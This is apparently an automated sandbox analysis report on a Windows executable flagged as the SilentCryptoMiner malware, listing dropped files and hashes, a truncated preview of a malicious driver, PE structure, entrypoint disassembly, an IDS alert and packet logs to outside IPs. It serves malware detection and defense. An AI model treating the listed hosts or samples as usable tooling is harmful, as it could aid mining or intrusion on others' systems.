                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mxaiwer.daq.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiu0pqbk.vqi.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1fnyn2f.g0l.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zk33mdfs.n02.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1510207563435464
                                                                              Encrypted:false
                                                                              SSDEEP:3:NlllulvX/Z:NllUvX
                                                                              MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                                              SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                                              SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                                              SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_g1co4ya1.hoh.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_mbxbqitq.scx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_nscm1o4l.nbn.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_xezwn35o.0es.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\amhsyemgqpki.sys

                                                                              Download File
                                                                              Process:C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: LfHJdrALlh.exe, Detection: malicious, Browse
                                                                              • Filename: iKvzvknzW1.exe, Detection: malicious, Browse
                                                                              • Filename: 2zirzlMVqX.bat, Detection: malicious, Browse
                                                                              • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                              • Filename: f5TWdT5EAc.exe, Detection: malicious, Browse
                                                                              • Filename: luQ2wBh8q6.exe, Detection: malicious, Browse
                                                                              • Filename: lokigod.exe, Detection: malicious, Browse
                                                                              • Filename: nfkciRoR4j.exe, Detection: malicious, Browse
                                                                              • Filename: File.exe, Detection: malicious, Browse
                                                                              • Filename: rLaC8kO1rD.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.50791529944184
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:nlGOh9K5X5.exe
                                                                              File size:7'198'720 bytes
                                                                              MD5:6369ad2a31d25fa131268f312b0c9d03
                                                                              SHA1:3560bbb24d688b8356615077ff8509d3fb438e05
                                                                              SHA256:aca4c0d0dc6f260200ea503a5ce8b370f482044253613142efcdebe5fd92a9f3
                                                                              SHA512:bcb3082810b809e7b2c733a6a5e4ace79c30116854a546a3e92d76806059e3d097090b5d924e93bbacf51105e70e6385579bb01fa7d1c590b53f934f426656b6
                                                                              SSDEEP:196608:RLtecVgZlN3f+OvbCJLfuufYst5BpS7M4F:R/V0v+Ov+R2ufpk73F
                                                                              TLSH:D2760238F7B71868E409D3792C5FB08D74D1E42F7B56259697E53B02947C0E388EE28A
                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....:g.........."..........Bm.....@..........@.............................Pn.......m...`........................................

                                                                              File Icon

                                                                              Icon Hash:39452592e2f89d86

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x140001140
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673AD91E [Mon Nov 18 06:05:18 2024 UTC]
                                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:de41d4e0545d977de6ca665131bb479a

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              dec eax
                                                                              mov eax, dword ptr [00009ED5h]
                                                                              mov dword ptr [eax], 00000001h
                                                                              call 00007F84B0FC9F0Fh
                                                                              nop
                                                                              nop
                                                                              nop
                                                                              dec eax
                                                                              add esp, 28h
                                                                              ret
                                                                              nop
                                                                              inc ecx
                                                                              push edi
                                                                              inc ecx
                                                                              push esi
                                                                              push esi
                                                                              push edi
                                                                              push ebx
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov edi, dword ptr [eax+08h]
                                                                              dec eax
                                                                              mov esi, dword ptr [00009EC9h]
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F84B0FC9F30h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              je 00007F84B0FC9F2Bh
                                                                              dec esp
                                                                              mov esi, dword ptr [0000BE19h]
                                                                              nop word ptr [eax+eax+00000000h]
                                                                              mov ecx, 000003E8h
                                                                              inc ecx
                                                                              call esi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F84B0FC9F07h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              jne 00007F84B0FC9EE9h
                                                                              dec eax
                                                                              mov edi, dword ptr [00009E90h]
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F84B0FC9F0Eh
                                                                              mov ecx, 0000001Fh
                                                                              call 00007F84B0FD2C14h
                                                                              jmp 00007F84B0FC9F29h
                                                                              cmp dword ptr [edi], 00000000h
                                                                              je 00007F84B0FC9F0Bh
                                                                              mov byte ptr [006CD279h], 00000001h
                                                                              jmp 00007F84B0FC9F1Bh
                                                                              mov dword ptr [edi], 00000001h
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E7Ah]
                                                                              dec eax
                                                                              mov edx, dword ptr [00009E7Bh]
                                                                              call 00007F84B0FD2C0Bh
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F84B0FC9F1Bh
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E50h]

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcce80x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d30000x10cbc.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6d00000x18c.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e40000x78.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xb0a00x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4100x138.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xce800x158.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x90660x92001104aca161d4269a6a883df6fbab5ac8False0.4898865582191781data6.156079152445191IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0xb0000x243c0x2600bc2c6868f9470677f4814681dbe1b087False0.4602179276315789data4.614036911896442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xe0000x6c1a900x6c0600b242e91f9108fd7cad696eee04219bc6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0x6d00000x18c0x2003e0799d7a731cb30724f6ff058cc0479False0.51953125data3.2014356061461786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .00cfg0x6d10000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .tls0x6d20000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x6d30000x10cbc0x10e00269eb2e7f9438c2ff98bfae819dbb84dFalse0.5713831018518518data6.567099990621836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x6e40000x780x200eb2386826cd56791515e8d23c48ace06False0.236328125data1.4427395347148653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x6d30f40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.5781231515438305
                                                                              RT_GROUP_ICON0x6e391c0x14data1.15
                                                                              RT_VERSION0x6e39300x38cPGP symmetric key encrypted data - Plaintext or unencrypted dataEnglishUnited States0.3370044052863436

                                                                              Imports

                                                                              DLLImport
                                                                              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-06T22:46:13.687422+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1172.67.19.24443192.168.2.449731TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 6, 2024 22:46:10.248847961 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:10.368598938 CET103434973051.89.23.91192.168.2.4
                                                                              Dec 6, 2024 22:46:10.368710041 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:10.369319916 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:10.495127916 CET103434973051.89.23.91192.168.2.4
                                                                              Dec 6, 2024 22:46:11.577127934 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:11.577172041 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:11.577246904 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:11.606410027 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:11.606429100 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:11.638334990 CET103434973051.89.23.91192.168.2.4
                                                                              Dec 6, 2024 22:46:11.638448954 CET103434973051.89.23.91192.168.2.4
                                                                              Dec 6, 2024 22:46:11.638509035 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:12.838176966 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:12.839889050 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:12.839916945 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:12.841574907 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:12.841639996 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:12.843626976 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:12.843713999 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:12.843786955 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:12.843796015 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:12.888501883 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.686959982 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687035084 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687130928 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.687156916 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687185049 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687215090 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687222004 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.687237024 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687271118 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.687277079 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687318087 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.687357903 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.701683044 CET49731443192.168.2.4172.67.19.24
                                                                              Dec 6, 2024 22:46:13.701719046 CET44349731172.67.19.24192.168.2.4
                                                                              Dec 6, 2024 22:46:13.713295937 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:13.713335991 CET4973010343192.168.2.451.89.23.91
                                                                              Dec 6, 2024 22:46:13.713705063 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:13.833571911 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:13.833676100 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:13.836688995 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:13.957084894 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.105489016 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.105516911 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.105623960 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:15.106512070 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:15.226356983 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.503504992 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.544719934 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:15.742336988 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:15.794701099 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:21.359273911 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:21.404124975 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:27.395590067 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:27.451077938 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:33.400979042 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:33.451086998 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:43.378029108 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:43.419884920 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:46:53.410732031 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:46:53.498033047 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:03.377741098 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:03.498107910 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:13.401993036 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:13.498107910 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:23.413482904 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:23.498117924 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:25.485699892 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:25.607590914 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:35.497890949 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:35.607557058 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:45.386985064 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:45.498229980 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:47:55.385549068 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:47:55.498253107 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:05.460937977 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:05.607640028 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:15.389610052 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:15.498331070 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:27.372390032 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:27.607765913 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:37.382154942 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:37.424334049 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:47.404716969 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:47.498562098 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:48:57.433058023 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:48:57.607865095 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:49:07.410062075 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:49:07.607964039 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:49:17.425290108 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:49:17.498589993 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:49:27.451103926 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:49:27.498629093 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:49:37.407651901 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:49:37.498676062 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:49:53.419831038 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:49:53.498692989 CET4973210343192.168.2.451.15.193.130
                                                                              Dec 6, 2024 22:50:03.408018112 CET103434973251.15.193.130192.168.2.4
                                                                              Dec 6, 2024 22:50:03.608123064 CET4973210343192.168.2.451.15.193.130

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 6, 2024 22:46:10.088865042 CET5266853192.168.2.41.1.1.1
                                                                              Dec 6, 2024 22:46:10.229141951 CET53526681.1.1.1192.168.2.4
                                                                              Dec 6, 2024 22:46:11.438251019 CET5652853192.168.2.41.1.1.1
